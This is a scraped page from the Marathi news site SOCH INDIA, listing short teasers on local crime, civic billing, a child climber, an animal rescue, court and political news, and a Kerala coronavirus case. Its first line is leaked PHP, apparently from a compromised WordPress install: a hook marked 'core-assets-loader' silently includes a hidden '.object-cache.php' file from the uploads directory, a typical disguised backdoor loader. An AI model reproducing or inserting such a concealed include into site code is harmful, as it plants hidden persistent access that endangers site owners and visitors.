add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); समाचार – SOCH INDIA
Menu

राज्याचे नूतन सहकार व पणनमंत्री बाळासाहेब पाटील यांच्या कराडमधील स्वागत मिरवणुकीतील गर्दीचा फायदा घेत लोकांच्या गळय़ातील सोनसाखळय़ा व पैशाच्या पाकिटांवर डल्ला मारणारे बीड येथील सराईत चोरटे त्रिकुट गजाआड करण्यात पोलिसांच्या कराड शहर गुन्हे अन्वेषन विभागाच्या पथकाला यश आले. पोलीस उपअधीक्षक सुरज गुरव यांच्या मार्गदर्शनाखाली ही कारवाई फत्ते झाली. पोलिसांनी...

Read More

ठाणे महापालिकेच्या पाणी देयकाची रक्कम जास्तीत जास्त वसूल व्हावी यासाठी आता थकीत पाणी देयकांच्या रकमेवरील दंड आणि व्याजामध्ये विशेष सवलत देण्याचा निर्णय प्रशासनाने घेतला आहे. त्यानुसार चालू रक्कमेसोबतच थकीत रक्कम भरली तर त्यावरील दंड आणि व्याजामध्ये नागरिकांना ५० टक्के सवलत मिळणार आहे. यामुळे थकीत रक्कमेची वसुली होऊन महापालिकेच्या उत्पन्नात...

Read More

ज्या वयात आई-बाबांचे हात धरून चालायचे, त्यांच्या अंगा-खांद्यावर खेळायचे त्या वयातली चिमुरडी चक्क गड-किल्ले मोठय़ा उत्साहात चढते आणि पाहणाऱ्यांना थक्क करून टाकते. प्रजासत्ताकदिनी या चिमुरडीने कर्जत-पनवेलच्या सीमेवर असलेल्या प्रबळगडाचा कलावंतीण सुळका सर करून तिरंगा फडकवला. शर्विका म्हात्रे असे या चिमुरडीचे नाव आहे. अलिबाग तालुक्यातील लोणारे गावची ही गडकन्या आहे....

Read More

पाण्याच्या शोधात १५ फूट चिखलात अडकलेल्या तीन गाईंसह एक वासराची तब्बल १६ तासांच्या चाललेल्या रेस्क्यू ऑपरेशननंतर  अ‍ॅनिमल राहतच्या स्वयंसेवकांनी सुखरूप सुटका केली. यासाठी पोलिसांच्या गस्ती पथकाचीही मदत मोलाची ठरली. मिरज पंढरपूर महामार्गालगत कळंबी सिद्धेवाडीच्या हद्दीतील काकासाहेब पाटील यांच्या शेतात बांधाशेजारील पंधरा फूट खोल चिखलात तीन खिलार गाई एका वासरा...

Read More

उत्तर प्रदेशातील शहाजहांपूर येथील कायद्याचे शिक्षण घेणाऱ्या एका विद्यार्थीनीवर कथित बलात्कार प्रकरणातील माजी केंद्रीय मंत्री आणि भाजपा नेते स्वामी चिन्मयानंद यांना इलाहाबाद हायकोर्टाने सोमवारी जामीन मंजूर केला. हायकोर्टाने १६ नोव्हेंबर झालेल्या सुनावणीवेळी आपला निर्णय राखून ठेवला होता. या बलात्कार प्रकरणातील नाट्यमय घडामोडींनंतर सुप्रीम कोर्टाच्या आदेशानुसार गेल्या वर्षी सप्टेंबर महिन्यात...

Read More

जालना जिल्ह्यातील परतूरचे भाजप आमदार बबनराव लोणीकर यांनी महिला तहसीलदार रुपा चित्रक यांचा उल्लेख ‘हिरॉईन’ असा केला होता. हिरॉईन शब्दाचा अर्थ डॅशिंग महिला असा अभिप्रेत होता अशी त्यांनी सारवासारव करुन या वक्तव्यावर पडदा टाकण्याचा प्रयत्न केला. राज्यभरातून लोणीकर यांच्यावर टीकेची झोड उडाली आहे. दरम्यान परतुरच्या तहसीलदार रुपा चित्रक सुट्टीवर...

Read More

काही पात्र ही अनुक एका व्यक्तीसाठीच साकारण्याच येतात, याचं उदाहरण आजवर अनेकदा कलाजगतातून मिळालं आहे. यातीलच एक उदाहरण म्हणजे अभिनेता डॉ. अमोल कोल्हे यांनी साकारलेली छत्रपती संभाजी राजे यांची भूमिका. स्वराज्यासाठी ज्याप्रमाणे छत्रपती शिवाजी महाराज यांनी दिवसरात्र एक करत मुहूर्तमेढ रोवली, त्याचप्रमाणे ही परंपरा पुढे सुरु ठेवत परकीयांच्या नजरेपासून...

Read More

केरळमध्ये कोरोना विषाणूची लागण झालेला तिसरा रुग्ण आढळला आहे. या रुग्णाचा अहवाल पॉझिटिव्ह आला आहे. केरळच्या कासारगोडमध्ये हा रुग्ण आहे अशी माहिती राज्याच्या आरोग्यमंत्री के.के.शैलजा यांनी दिली. भारतातील कोरोना विषाणूचा हा तिसरा रुग्ण आहे. याआधी कोरोनाची लागण झालेले दोन्ही रुग्ण केरळमधीलच आहेत. तिसऱ्या रुग्णावर कासारगोडमधील कांजनगड जिल्ह्यातील रुग्णालयात उपचार...

Read More